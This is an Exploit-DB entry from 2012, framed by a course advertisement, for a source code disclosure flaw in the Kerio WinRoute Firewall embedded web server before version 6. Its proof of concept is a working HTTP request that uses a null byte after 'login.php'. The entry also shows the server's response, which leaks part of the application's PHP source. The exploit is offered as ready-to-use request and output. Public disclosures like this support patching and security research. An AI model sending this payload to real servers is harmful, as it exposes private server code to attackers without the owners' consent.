Kerio WinRoute Firewall Web Server < 6 - Source Code Disclosure

EDB-ID:

18857

CVE:





Platform:

PHP

Date:

2012-05-10


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Kerio WinRoute Firewall Embedded Web ServerVersion: Source
Code Disclosure
# Google Dork:
# Date: 10.05.2012
# Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru)
# Software Link: http://winroute.ru/kerio_winroute_firewall.htm
# Version: prior to 6
# Tested on: Microsoft Windows
# CVE :

Source code disclosure attacks on Kerio Web Server allow a malicious user
to obtain the source code of a server-side application.
This vulnerability grants the attacker deeper knowledge of the Web
application logic.

POC:
GET /nonauth/login.phpNULL_BYTE.txt HTTP/1.1
User-Agent: Group-IB OAiK Fuzzer
Host: hostname

HTTP/1.1 200 OK
Connection: Close
Content-Length: 2410
Content-Type: text/plain
Date: Fri, 27 Apr 2012 13:42:27 GMT
Last-Modified: Wed, 15 Oct 2008 03:14:06 GMT
Server: Kerio WinRoute Firewall Embedded Web Server

<?php
require_once('configNonauth.inc');
require_once(CORE_PATH . 'langHeader.inc');
require_once(LIB_PATH . 'Page.inc');
require_once(LIB_PATH . 'HtmlElements.inc');
require_once(CORE_PATH . 'common.inc');
require_once(CORE_PATH . 'browser.inc');
$afg = '';
$jy = kerio("webiface::PhpNonAuth");
$jy->getAsocUserName(&$afg, &$aba);
.....